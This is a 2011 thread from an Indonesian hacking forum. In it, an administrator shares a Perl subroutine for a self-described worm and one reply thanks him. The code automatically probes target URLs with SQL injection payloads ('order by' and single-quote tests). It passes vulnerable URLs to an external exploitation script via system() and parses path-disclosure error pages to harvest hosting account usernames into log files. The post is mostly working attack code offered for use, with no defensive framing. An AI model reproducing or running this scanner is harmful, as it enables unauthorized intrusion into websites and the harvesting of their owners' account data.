Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-23-2013, 10:43 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Programming › Perl v
« Previous 1 2

perl: module pemeriksa sqli dan path disclosure get username

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
perl: module pemeriksa sqli dan path disclosure get username
02-06-2011, 03:18 AM
Post: #1
mywisdom Offline
Administrator
*******
Administrators 		Posts: 921
Joined: Dec 2009
Reputation: 44
perl: module pemeriksa sqli dan path disclosure get username
Code:
sub tessqli()
{
eval
{
    
$kena_bug="tidak";
open (MYFILE, '>>daftar_sqli1.txt');
open (MYFILE3, '>>daftar_disclosure1.txt');

$url=$url_target."1+order+by+1--";
do_visit();
$panjang1=length($isi_halaman);
$url=$url_target."1+order+by+100--";
print "\nchecking possible blind sql bugs at : $url\n";
do_visit();
$isi_halaman_order_by_100=$isi_halaman;
$panjang2=length($isi_halaman);
$selisih=$panjang2-$panjang1;
$url=$url_target."1'";
do_visit();



      
                       if ($isi_halaman_order_by_100 =~ /Unknown column '100'/ || (($panjang1>$panjang2) && ($selisih>256)))
                               {
                                                       our $kena_bug="ya";
                                                        print "woot found sqli at:".$url."\n";
                                                        print MYFILE $url."\n";
                                                        lihat_waktu();
                                                        if(($menit=~"55"))
                                                        {  
                                               system("killall php hzosql.php");
                                                        }
                                                        $url=str_replace("'",'',$url);
                                                        $url =~ s/^\s+//;
                                                    $url =~ s/\s+$//;
                                                        system("php hzosql.php '$url' &");
                                if($isi_halaman=~/on line/ && $isi_halaman=~/public_html/)
                               {
                                   print "\nw00t !!!! found path disclosure !!! at :$url\n";
                                    my @aray_url= split("/", $url);
                                                                    
$target_host=$aray_url[2];
                                     my @pecahan_konten = split('/', $isi_halaman);
                                     $t=0;
                                    
foreach $pecah(@pecahan_konten)
                                       {
                                        
if($pecah=~/ublic_htm/)
                                        
   {
                                        
    $z=$t-2;
                                        
    $y=$t-1;
                                        
  
                                        
    if($pecahan_konten[$z]=~/home/)
                                        
       {
                                        
           print "\nour worm found username:".$pecahan_konten[$y]." on
$target_host\n";
                                        
           $data_path=$target_host." ".$pecahan_konten[$y]."\n";
                                        
            print MYFILE3 $data_path."\n";
                                        
       }
                                        
    last;
                                        
   }
                                        
   $t++;
                                       }
                               }
                              
                                                       }
                                                      else
                                                     {
                                                     open (MYFILE2,'>>fail_sqli1.txt');
                                                     print MYFILE2 $url."\n";
                                                     close (MYFILE2);  
                            }
   close (MYFILE);  
    close (MYFILE2);  
        close (MYFILE3);  
}
}
Find all posts by this user
Quote this message in a reply
05-01-2011, 02:09 AM
Post: #2
dewancc Offline
./Devilz Commander
 		Posts: 311
Joined: Dec 2009
Reputation: 1
RE: perl: module pemeriksa sqli dan path disclosure get username
Ini dia yang dari tdi wa cari2 :)
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [PERL] Install Perl di Windows sang.sakaya 3 1,835 03-19-2013 09:24 AM
Last Post: dizi13
  Perl Collection el_nino 17 3,491 02-11-2013 09:22 PM
Last Post: ghosthands
Lightbulb Referensi dan OOP pada PERL yust 5 168 12-29-2012 05:42 AM
Last Post: ganjang
  Zone-H mass poster [perl] war0k 4 160 12-09-2012 08:54 PM
Last Post: war0k
  Kenalan Dengan PERL wenkhairu 8 2,867 07-18-2012 09:50 PM
Last Post: monyett
  added unix botnet module for hidden cron ev1lut10n 0 590 01-15-2012 07:26 AM
Last Post: ev1lut10n
  [Ask] Upload file dengan PHP & Perl helsinki 5 634 01-12-2012 05:38 AM
Last Post: helsinki
Lightbulb [Ask] help me script perl rydcenter 0 828 08-01-2011 05:22 PM
Last Post: rydcenter
  [ask] tentang perl cancer 2 618 07-15-2011 10:47 AM
Last Post: jomblo1991
  Simple Port Scaner dengan PERL wenkhairu 4 1,430 06-13-2011 11:18 PM
Last Post: selfdefense

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-23-2013, 10:43 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE